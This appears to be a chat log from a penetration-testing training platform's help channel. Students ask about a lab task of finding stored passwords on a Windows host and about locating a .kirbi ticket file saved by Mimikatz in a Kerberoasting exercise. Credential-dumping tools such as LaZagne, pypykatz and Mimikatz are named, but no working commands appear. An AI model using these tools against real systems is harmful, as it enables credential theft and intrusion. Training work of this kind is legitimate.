If you go to the Welcome channel and verify you can add screenshots
Upon rdp
I get to see chrome, firefox and recycle bin
Are you asking something on AppData folder?
no, another application on the machine
ChromeSetup.exe
KeePass-2.50-Setup.exe
lazagne.exe
616960 pd64.exe
pypykatz.ex
Among these?
which one of those, that is already installed on the machine, might have passwords in it?
Really..
Upon running all these I really get no output
Just a cmd opens and quickly closes automatically, I don't even see the output
Are you RDP into the machine?
done both RDP and evil-winrm...
lazagne.exe say so passwords
KeePass ask for administrator password which I don't have
And the rest gives nothing
sounds like you need a password still to access the app
can I DM you?
sure
it's very difficult to verify
to module ACTIVE DIRECTORY ENUMERATION & ATTACKS
section: Kerberoasting - from Windows
When using Mimikatz to extract TGS Kerberos, we got this
* Saved to file : 2-40a10000-htb-student@MSSQLSvc~DEV-PRE-SQL.inlanefreight.local~1433-INLANEFREIGHT.LOCAL.kirbi
How can we find this kirbi file? I tried to find it locally but failed. Thanks in advance
go to the #welcome channel and follow the steps there